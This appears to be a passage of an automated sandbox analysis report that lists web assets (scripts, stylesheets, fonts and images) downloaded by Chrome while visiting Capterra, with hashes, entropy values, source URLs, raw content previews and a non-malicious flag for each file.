                                                                                                                                                                                                        Preview:...........{..8.0...).m'#.c;q.rU..M.=..i......mk"K.Iv...|...I..8Mg..{.m,Q.. .. ..?.i...F.,LX..'Q<wR?....9..0.X....;:..v..[.$.wo_...8o..i.....',..n.x../g....S......~..z=....2....a.......I.gM......L....N..n.......Y...Y....|.1.+'n.v....O:....a..m.><vN..z...c..wph..<..'......6<..x|p.92.......y3m...m.~.....f.ypb.v..........pd.4;..bf..7..](..=...7....S...B.....^..0..^......'7~......0.]..U.1.]...o..t......1s..TE.......+W?.Z.D?<.F.{6l6...I.....u.Y.fR.X]+`.4..6..8. ...[o.....f..L..........v.........!.i....w..BA.q.pj.2`...Z......Y.....L...c.C.B..,...23....(X.C.*..XY......[..wl.o..;z......=.C...A..q.H...5.1m.3'~.y.,...z.,.C..p.p...S.....PG.p..:....$....h....3_.@.l......g...6...>..........?..-..e.>....t....oSkhM..l.Ye.<....pZ...k...{ZI."...G...%j.G...l...3&. ~+..D1Ez...%H.i....10.=....x.........H;8<8.O...".aO|.vEZ.w..OG..#.vrx(.;.....{"......k...T<.uE.G....w*....dZ...r".v.....'.v.=U1.#..PV.=<..u......c.`........E^..I.DV.EK..9;.e..6..ma.:'..|..
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (31410), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):31410
                                                                                                                                                                                                        Entropy (8bit):5.39987368207557
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:KaHMD5DU8gZDYLY/j/KA5YotDREoqNF/DA0YttKREtqIpCMk2UOZhWUgeyDjXNth:K9Ds0VEz5zR+h
                                                                                                                                                                                                        MD5:FBA1C16A1084513CF2DF00894745CA99
                                                                                                                                                                                                        SHA1:E03981D772CBDAC7E6D953C823793BA161FCFE32
                                                                                                                                                                                                        SHA-256:8FFF70900A81C98901A969D789D6B778F8453C9A10FB99F6C6461400F0E3E9EA
                                                                                                                                                                                                        SHA-512:721C87540FA9F2C2D148CD1D01B55060034E4643CC1FAE06F1040A4CB1FA8143E8462F13D77F584C201F7A75059F96649EA1A830137EFF5152593244041136C7
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://js.driftt.com/core/assets/css/8.6ac3976b.chunk.css
                                                                                                                                                                                                        Preview:.drift-widget-avatar{-webkit-border-radius:50%;-moz-border-radius:50%;border-radius:50%;overflow:hidden;border:2px solid #fff;height:56px;width:56px;-webkit-background-size:cover;-moz-background-size:cover;background-size:cover;background-position:50%}.drift-widget-avatar.drift-widget-avatar--small{width:28px;height:28px;-webkit-box-shadow:none;-moz-box-shadow:none;box-shadow:none}.drift-widget-avatar.drift-widget-avatar--medium{width:46px;height:46px;-webkit-box-shadow:none;-moz-box-shadow:none;box-shadow:none}.drift-widget-landingpage-layout .drift-widget-avatar.drift-widget-avatar--small{width:42px;height:42px}@font-face{font-family:Brandon;font-style:normal;src:url(https://js.driftt.com/deploy/assets/static/fonts/BrandonText-Regular.woff)}@font-face{font-family:Brandon;font-weight:700;src:url(https://js.driftt.com/deploy/assets/static/fonts/BrandonText-Bold.woff)}@font-face{font-family:Lato;font-style:normal;font-weight:400;font-display:swap;src:url(https://js.driftt.com/deploy/ass
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, baseline, precision 8, 500x374, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):17632
                                                                                                                                                                                                        Entropy (8bit):7.949997398074455
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:oVfTjcUukRKkPSbZZmwsKx0l8+st3/XetHLLO:UfTjcUukRI/mw90O+o/OtHnO
                                                                                                                                                                                                        MD5:BE9E7E58AEBBB14880B8D0281FCC6F6A
                                                                                                                                                                                                        SHA1:E9A5B417BCE04A7EC97AD165D300A316286CD05B
                                                                                                                                                                                                        SHA-256:A6DB69CBD5DFFA94028B0273598C93EEDDE6A8B773169D274088544C1522F347
                                                                                                                                                                                                        SHA-512:4C1985BB4096FF85265EE699E00E39A70138E500720147E64F8AD04589CF887EE9356E1413128344D3D3ADD43F150C1D2E956D8DF6DB2DDFCC55CE3A1BD95BC4
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.....C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((......v...."........................................W............................!1Q..ARaq"23.....Sbr.....#4BT...$7CUcs....Dt.&56Ed...%'e.................................5.......................!..1Q..2A3aq."....R...#B...b............?................fM..iq...+.!.6.....hk@h..,.....r^^.}o.H.#.....r^^.}o.H.#.....r^^.}o.H.#.....r^^.}o.H.#.....r^^.}o.H.#.....r^^.}o.H.#.....r^^.}o.H.#.....r^^.}o.H.#.....r^^.}o.H.#.....r^^.}o.H.#.....r^^.}o.H.#.....r^^.}o.H.#.....r^^.}o.H.#.....r^^.}o.H.#.....r^^.}o.H.#.....r^^.}o.H.#.....r^^.}o.H.#.....r.,l.........".".2X..om...T.D@DD.D@DD.D@DD.D@D&..\E...P^../.._.......i....^.....-t...h..;.._.........Q..z.@..%...._....%..6w.x7@DD.D@DD.D@DD.D@DD.D@DD.D@DD.D@DD.D@DD.D@DD..vx.r.nP...>.+w ." ""." ""." ""." .M.]....l..Y.....&/..#....c.l.v........2....]....B..a.9.l..w..1jFTe.\.1K....to.{s.M.#~..>.]......|._.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (4785), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):4785
                                                                                                                                                                                                        Entropy (8bit):5.80178003388208
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:1gWUfvlcY021mvn1blhad7OIJoodnbUp2dEjkRUjjKF6L:1DY0hf1bT47OIqWb1ajK4L
                                                                                                                                                                                                        MD5:FB37B4FDFC55B8FA86DEF4A44C0137C9
                                                                                                                                                                                                        SHA1:71B08121576C280AE3F8227C3E77EE05EB9E0C85
                                                                                                                                                                                                        SHA-256:4DF3B728C47FECA23808DBDC6282DEEC121C5555CF18D6AB79BAA1157608FB15
                                                                                                                                                                                                        SHA-512:7A472155BD28AB6ABD1FDF0385A67B1F4FC45FCA7C5883AB571370926D8767132275C3702AE41B7217C8F56698AB3A39A3B5A50299F464359E375FEC238122E0
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://googleads.g.doubleclick.net/pagead/viewthroughconversion/1072635088/?random=1725034620739&cv=11&fst=1725034620739&bg=ffffff&guid=ON&async=1&gtm=45be48s0z876106154za201zb76106154&gcd=13t3t3t3t5l1&dma=0&tag_exp=0&u_w=1280&u_h=1024&url=https%3A%2F%2Freviews.capterra.com%2Fsearch%2F&ref=https%3A%2F%2Fwww.capterra.com%2F&hn=www.googleadservices.com&frm=0&tiba=Capterra%20%7C%20Review%20Software&npa=0&pscdl=noapi&auid=1810143887.1725034608&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=ads_data_redaction%3Dfalse&rfmt=3&fmt=4
                                                                                                                                                                                                        Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 24448, version 1.0
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):24448
                                                                                                                                                                                                        Entropy (8bit):7.99088597353699
                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                        SSDEEP:384:9BNdyPCV6NIidqJh7Pc7qK10yJ/smPzyL6AdcEoJwDvVa7U03NymBtpxev7++/9H:bKCV6NiWuKdJ/smby+ZJSvsU0dnE7/Qg
                                                                                                                                                                                                        MD5:865E46AF816320C9F32234E8968558D0
                                                                                                                                                                                                        SHA1:6791E9F732FCBDE0F375F84CCBC14C4AC72795A3
                                                                                                                                                                                                        SHA-256:6C84348296EBE2E2A0830C3962EB02156419D9BC76371C2EADAF7329D827D550
                                                                                                                                                                                                        SHA-512:34EB9CB9C4DCA6E0CA7FA1C9379E49AF97E9CCB7C94A6A4B9CCD4D6EA62007B70A4792463902BAE705177CCAA46DA883C06911074BC13C6DD403C4EB18965074
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/lato/v24/S6u_w4BMUTPHjxsI5wq_Gwft.woff2
                                                                                                                                                                                                        Preview:wOF2......_........(.._"..........................H.p.`..D....e...........B..6.$..v. ..6..E.K.G.%l\e.v@..}*5.a.G-:....T.fZ.....d..v..V.. b.$..BM8J.....Z..k$..`..*?..3.*.&Q..yO...k.GG./.G.ql.E.....~....o.}.^.k&o.M.O...[..'.4.A.p....u...E`.bG........}NU....G.V..L.#.R!...f.M......9jlc...Qc.:.....T............F5.?o.:..k.Z.W...!.h...^.....t..7..Ns.9...a.xC...7,.....^...a:...QI..Gj6sF..T.P'xq....C.K.pz.@v..*)LVQ..h..v..uV{@.e8...{.5...yG..x....n.6.!...m..@.'. ...Q.v.\6.[..f.....s.?.sL..E...2.>b.CG...>b..Yr......*.m....8/D..n{..8..[.....V...>.h.t....!./v...h..`E..y.I..~.H...,[.w..^....jg.w...:.....a..j{.....Q...G..K^......t...[.......zNc5BV....T......N$.][r.6Jr..`..u...'..~.7..7b...0I ....$8.@M.F7.F EQ.NH........R.g.8.SH.=.p..u....?.....&......r.g......*|............^......PR....#ug.6.F..>..K;...Q..Z..Y....jB ......"s.w.ei3@..8....HW.......%....DDD.G.......eo(%K... ....a:..dH...UJ...........J..lC.~.}.......R.......E.vbe[<f....*...z...>iP9o......j).
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (34447)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):35585
                                                                                                                                                                                                        Entropy (8bit):5.227858835404307
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:C1NpkslDFLmy+/XFsyIPd3w1jr21pKJCngCZyzI5hul6OY9g4+7mZ9kvnTLvPfUz:aLk6q/2yCB5LW/HsESrp
                                                                                                                                                                                                        MD5:37633505B47EDA9DA0BD471C2816B38B
                                                                                                                                                                                                        SHA1:19E95D883A11781146EF46E70339F21726AE9121
                                                                                                                                                                                                        SHA-256:1A65C9631279409053461333989AC0E7BDCC7D1E2832EA889E746628DB99E0F6
                                                                                                                                                                                                        SHA-512:40904E3526E5D5A400C56E22930350A3141A14D4707EF4B23F6C0C16CE9F0BABD92EAB4F59D96C59BD4AC882B1122BF94740037B6818F2F1B1411BD89C164983
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://public.profitwell.com/js/profitwell.js?auth=c61691493c428b337ecf0f72fa2f9c82
                                                                                                                                                                                                        Preview:!function(){"use strict";var t=function(){function t(){}return t.prototype.trackAnonymousCustomer=function(){},t.prototype.getAnonymousId=function(){return null},t}(),e=function(t,r){return(e=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}||function(t,e){for(var r in e)Object.prototype.hasOwnProperty.call(e,r)&&(t[r]=e[r])})(t,r)};./*! *****************************************************************************. Copyright (c) Microsoft Corporation... Permission to use, copy, modify, and/or distribute this software for any. purpose with or without fee is hereby granted... THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH. REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY. AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT,. INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM. LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2134)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):13188
                                                                                                                                                                                                        Entropy (8bit):5.4223896155104025
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:i11kqRm4UjryX2DfatZrT80NCGz5r2zItrX:iEqRm4cy338m7d
                                                                                                                                                                                                        MD5:7C96A5F11D9741541D5E3C42FF6380D7
                                                                                                                                                                                                        SHA1:D3FA2564C021CF730E58FFDDB138CF6B57ED126E
                                                                                                                                                                                                        SHA-256:81016AC6BE850B72DF5D4FAA0C3CEC8E2C1B0BA0045712144A6766ADFAD40BEE
                                                                                                                                                                                                        SHA-512:23C162A2E268951729B580E5035AD6CA9969CFCC5CE58A220817B912E76B38BE6C29C3CA7680CB4E8198863D95A72EA65BD06FF7189B5C8475E4C1CE501AEAB1
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://ajax.googleapis.com/ajax/libs/webfont/1.6.26/webfont.js
                                                                                                                                                                                                        Preview:/*. * Copyright 2016 Small Batch, Inc.. *. * Licensed under the Apache License, Version 2.0 (the "License"); you may not. * use this file except in compliance with the License. You may obtain a copy of. * the License at. *. * http://www.apache.org/licenses/LICENSE-2.0. *. * Unless required by applicable law or agreed to in writing, software. * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT. * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the. * License for the specific language governing permissions and limitations under. * the License.. */./* Web Font Loader v1.6.26 - (c) Adobe Systems, Google. License: Apache 2.0 */(function(){function aa(a,b,c){return a.call.apply(a.bind,arguments)}function ba(a,b,c){if(!a)throw Error();if(2<arguments.length){var d=Array.prototype.slice.call(arguments,2);return function(){var c=Array.prototype.slice.call(arguments);Array.prototype.unshift.apply(c,d);return a.apply(b,c)}}return function(){return a.app
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ISO Media, AVIF Image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):1213
                                                                                                                                                                                                        Entropy (8bit):7.3676459495962145
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:+cKYj6LYqzJqQFNB4J9E7j30ANuxo/1swFDCQybNrI5lu70XlxtL0WRl5k4g:+cKYjwjFqOB4HG1RFDCr4A0XLxF4
                                                                                                                                                                                                        MD5:AD1F54AC67FD6A26992D0A1F86599281
                                                                                                                                                                                                        SHA1:9396180EE8B95378831816724408E9D987CC362C
                                                                                                                                                                                                        SHA-256:57CE31234130B9A6B8F4DA81400820A9B18E004653C9092E49FF4676A2A2FD6D
                                                                                                                                                                                                        SHA-512:1B4759283B452FAC8FBFAF3BA4BF53759D0A31677FA4052476BC2C8476E7A5B02B20638957DC79CB157C5FF2A570483DECCD4642F5B44EDDA4FC38DD67D3881C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://gdm-catalog-fmapi-prod.imgix.net/ProductScreenshot/13f1c805-bb5f-4777-ae73-15df50ea1d02.png?auto=format%2Ccompress&fit=max&w=128&q=75&ch=Width%2CDPR
                                                                                                                                                                                                        Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D....................(iinf..........infe........av01Color....jiprp...Kipco....ispe...........M....pixi............av1C........colrnclx...........ipma...................mdat........`...B2.......1@.J....w\.,.w>m....U[..E....i.Ex^N1.)..mp..!..wsz.3./..N.. 7^.=.....d..$.V~....v.;u..\...5..B52".\..d^7".z.....{n..@1{...7.u.K......R...ia.o..\.D|."Q..p1.....{.........n.2V.].a.E....?...iO..o=..g..B.r.S........5........l.....9..$.pey....d&.>n8#"....u.f..hRL)..X..2..HHLM..+.m14.TbU.....qA.....D...%..,..^...8D.H..".N....Yi.(...yF.7j..h...G.I.*....}...1....d).G..:MUoI...^....[.+...$..B.o....}........PA.5....O.nt.$c.....k.1.Z8!....4.sH.....9.B.}..Z{.....L....}.._.p...+.&....C..z.)..s.v.....U<(L.y:.N?......xG.z9.;../FU.V.X..#...^.is..&.{.gd.'q\.......0*.=J(...im..0.......H{:t....u'4....v.^...;...cB.tq..8..c/.d......z..a...M....e..B.9.U......8.b..+A.U..l".,
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 500 x 610, 8-bit colormap, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):97930
                                                                                                                                                                                                        Entropy (8bit):7.98785033288875
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:gwdYkR3gl3tgeKvih2GKxmmeLmIya2kMKkCrA3UEcXu/34aewjEk5siFLhL+dqg0:gtkRUgVvi7KaF2kMHRUEdjrF1qdqgHU
                                                                                                                                                                                                        MD5:84EAA1864BF35D534DCB91BF9D49119B
                                                                                                                                                                                                        SHA1:B2410BB0726018DBD6234D97356CC87FD0F11A58
                                                                                                                                                                                                        SHA-256:E9D4F55AB82BA81802FB2C03666F4F2DEBC61011A65FC5B4597178AC0B0ADAA9
                                                                                                                                                                                                        SHA-512:C683585081D2FAB8CF840F3CADA75EE410749E7B558974DEBB68E5E12F40401D0113D326747202CF80364CE5B6488420C6CE3C53F223CF8BA827F6CC592EEC59
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.PNG........IHDR.......b........{....PLTE..............bba..............r.....u.............................................................%...............#........*%.....d.+ ..a.% ..g..^I...4'.|YC1!..cOT7..fX.hVrP;_?%...k_;,.lH-.uieC*.qfyU<?'.N0.-..}`QC1.`<..m_K=%9!....sTC...H8.lK7G,.W:"[N/.dU9...yZJ.....].....zp^N;tN1...RF(l\@.oaM..............rX...XC/dG3..i..fVEjC".ya{kM.......x|.......VUT?3"........i.....\\]..p......]3.qsy..v.............v.ikp.......OMJ.hBcdg..s..y.f.[..GE>..<:6.........d.....u....g\H...}.........N/...n........sX...zb..w.....{L!.]4...S.......Y3.nHkU..u............!...n:...*.zO.......+......kC......{........f.....A..Z...wNK.......}.......b..Z...[H...-)....>-......@........8..o.O......+..tv.m..cf....%.4.Q...K..H./......tRNS..............B.g....S......pHYs............... .IDATx...O[g.6....l......."..M.#..q...N3...B.....!`.).........qg.Ekg....VH..1.R.!").3.$.......TC...q..j?.........yg..iclc.c|..
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65200)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):140962
                                                                                                                                                                                                        Entropy (8bit):5.269205002304615
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:MEv1NH6ZMumbFHH4jeUn6SJk1SNoc7I6rRsQo:MEzb5e6Sa1SRBF/o
                                                                                                                                                                                                        MD5:27146517071184FE51BABA67966EBC67
                                                                                                                                                                                                        SHA1:657FF8E9FA872828C1EDE1C4373141C27A7718BF
                                                                                                                                                                                                        SHA-256:BA5F8328A0B6D94815D24E27481690D799E33FB5CF1B0F326FF7BA8A0977EEA6
                                                                                                                                                                                                        SHA-512:985C1E2025221C0808D466D06C684F085C4DCACA028FA6252B8816534D98628534AC5974972C552C52F79447A0EC475560150E07B6509144C7F8EBA49746910E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9774],{52967:function(e,n,t){/**. * @license React. * react-dom.production.min.js. *. * Copyright (c) Facebook, Inc. and its affiliates.. *. * This source code is licensed under the MIT license found in the. * LICENSE file in the root directory of this source tree.. */var r,l,a,u,o,i,s=t(2784),c=t(14616);function f(e){for(var n="https://reactjs.org/docs/error-decoder.html?invariant="+e,t=1;t<arguments.length;t++)n+="&args[]="+encodeURIComponent(arguments[t]);return"Minified React error #"+e+"; visit "+n+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings."}var d=new Set,p={};function m(e,n){h(e,n),h(e+"Capture",n)}function h(e,n){for(p[e]=n,e=0;e<n.length;e++)d.add(n[e])}var g=!("undefined"==typeof window||void 0===window.document||void 0===window.document.createElement),v=Object.prototype.hasOwnProperty,y=/^[:A-Z_a-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u0
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):24
                                                                                                                                                                                                        Entropy (8bit):2.459147917027245
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXJ/lH:Dl
                                                                                                                                                                                                        MD5:BC32ED98D624ACB4008F986349A20D26
                                                                                                                                                                                                        SHA1:2D3DF8C11D2168CE2C27E0937421D11D85016361
                                                                                                                                                                                                        SHA-256:0C9CF152A0AD00D4F102C93C613C104914BE5517AC8F8E0831727F8BFBE8B300
                                                                                                                                                                                                        SHA-512:71ACC6DA78D5D5BF0EEA30E2EE0AC5C992B00EFEC959077DFE0AB769F1DBBD9AF12D5C5C155046283D5416BEB606A9EF323FB410E903768B1569B69F37075B4E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:GIF89a.......,..........
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (23149), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):23149
                                                                                                                                                                                                        Entropy (8bit):5.075511542663716
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:rtE6lh9sj56lNDM4cSmbmpcNQtfYA2ghL9ivuEesrSytJwevkMQVkHKxiSgX:rtzL9yMOQtQ49iYrytJwBhgX
                                                                                                                                                                                                        MD5:8ADD19CA3678CB8B4622720416FA7105
                                                                                                                                                                                                        SHA1:26153195BCDAEFBDF66B4F939A32A34C04EF1803
                                                                                                                                                                                                        SHA-256:A33721F354E78CBBA8FC8FEB81A57A26917C38270A53A95FA37EFBD9F66B1F43
                                                                                                                                                                                                        SHA-512:5421CF2908D6B03D5755E77433C1CA9BC787BDF2D393B54E31165BA39DFC338F2E70717DE516AA23A26ED95E0C048F5AE0F8987E8BA57BEEC1C0B39CED10398F
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://www.capterra.com/assets-capterra-monorepo-bx-capterra-www/_next/static/chunks/8278-9b11addb7c72c3ff.js
                                                                                                                                                                                                        Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[8278],{7663:function(e,a,t){t.r(a);var r=t(27573),o=t(80978);a.default=e=>{let{id:a,mobileTop:t="132",desktopTop:n="200"}=e,{deviceType:s}=(0,o.h)();return(0,r.jsx)("div",{className:"invisible relative block h-0",id:a,style:{top:"mobile"===s?"-".concat(t,"px"):"-".concat(n,"px")},children:"Tabset anchor"})}},20300:function(e,a,t){t.d(a,{default:function(){return f}});var r=t(27573),o=t(38458),n=t(57908),s=t(34617),i=t(7653),l=t(67604),c=t(20857);let m=(e,a)=>e>=a?a-a%2:e;var f=e=>{let a,{linkList:t,viewMoreBtnText:f,maxNumberOfLinks:d=20,showAllLinks:w=!1,viewMoreBtnEvent:u}=e,[g,p]=(0,i.useState)(w),{deviceType:v}=(0,c.hU)();return a="mobile"===v?g?m(t.length,d):5:m(t.length,d),(0,r.jsxs)(r.Fragment,{children:[(0,r.jsx)("ul",{className:"py-2xl md:gap-x-4xl mx-auto grid w-[90%] grid-cols-1 md:grid-cols-2",children:t.slice(0,a).map((e,a)=>{let{href:t,text:i,hasGA4:l,event:c}=e;return(0,r.jsx)("li",{"data-testid":"link
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 23040, version 1.0
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):23040
                                                                                                                                                                                                        Entropy (8bit):7.990788476764561
                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                        SSDEEP:384:adpABC4a0HkBpR1HWtGu06B6lsoAKiwY0HcLKglV6Z+DVb35PJZDdiZeJ1vqYg:0AHa0Ezf2tZn6lsoABwTKK46ZQb3V7wD
                                                                                                                                                                                                        MD5:DE69CF9E514DF447D1B0BB16F49D2457
                                                                                                                                                                                                        SHA1:2AC78601179C3A63BA3F3F3081556B12DDCAF655
                                                                                                                                                                                                        SHA-256:C447DD7677B419DB7B21DBDFC6277C7816A913FFDA76FD2E52702DF538DE0E49
                                                                                                                                                                                                        SHA-512:4AEBB7E54D88827D4A02808F04901C0D09B756C518202B056A6C0F664948F5585221D16967F546E064187C6545ACEF15D59B68D0A7A59897BD899D3E9DDA37B1
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/lato/v24/S6u9w4BMUTPHh6UVSwiPGQ.woff2
                                                                                                                                                                                                        Preview:wOF2......Z........8..Y...........................B.p.`..D....e.....d.....B..6.$..v. .....E.K...5l\e.v.~S$}.".8.....5.E....s...ai`W.u..8a2C..JuBj....x.....%.u.C.......p..c...7...+.1.GS.3...F_....-..`#........]...T.....x*....&..{.....V..,..&~$D.#.P..|gzz...B.7..m.3....HH.l.....Dj.F.X.....U..+.Q...T.`...ST...1...0....io`zu@.J2....3]}0.X...,..+"...............(k.CGl......`.y.._....3.t!O.,X:t.3....lw..U../:..b.]....V.$.y....G....*.H..IN....bQ.+ \@....;...C3...c.l..i/....#..I.).Y...]...s..$K!..Tr...g%|r.D.#.Y{..R..We...X.?...*r.@...G.{..>..4^..b..,.z........T..[.ru#.7..{..G....J.3......Lz.C].of$Y2..^...>@L..P.........7..bB.....6f...ec.i..{._\...A.I.Lcy.Qm".....k.^.d.K(x7U...c.o.......}.T......iL..!.Z.......[O..*.%...*'?........^I./..;t.4%.....S...4....wY.b9.%.b...,.....tC..9.Z...V..CHnA.S.-.u$m.\....7{,..K{(.."....._...|{.VowE@E@@..Zg.....`8..b..Z...^....l+...R..%.L.b...._..E.j9\+.L.#J.........?&...&..scE..b..Jc.8...V....L 1./k.3..7w....x..-.....
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):12820
                                                                                                                                                                                                        Entropy (8bit):4.678414118091167
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:G/Vg8qpJm/fVfCdSlexCRDokFPbK9JEmLuzwu:sV6rw1eSAUnFPyEmLi
                                                                                                                                                                                                        MD5:9A60A3960C550A8AC843BAA9B4254968
                                                                                                                                                                                                        SHA1:CB845D7F5D667922F61FCB0BA722D1A0FCDD6A4D
                                                                                                                                                                                                        SHA-256:79F520F3694EC8DBDBA29E839DA7E145701119302EEB6BF8D5DE5F2015B6BEC2
                                                                                                                                                                                                        SHA-512:80211EA3546151E5B1EA83C19D48A03D01644195FDD3E16055F379523D251D1A9DC615D7DDDF77242F6BE14B875836CC9044BA6494DAF2584330685CFAF7D6AD
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://publicate.it/images/outlook_client.svg
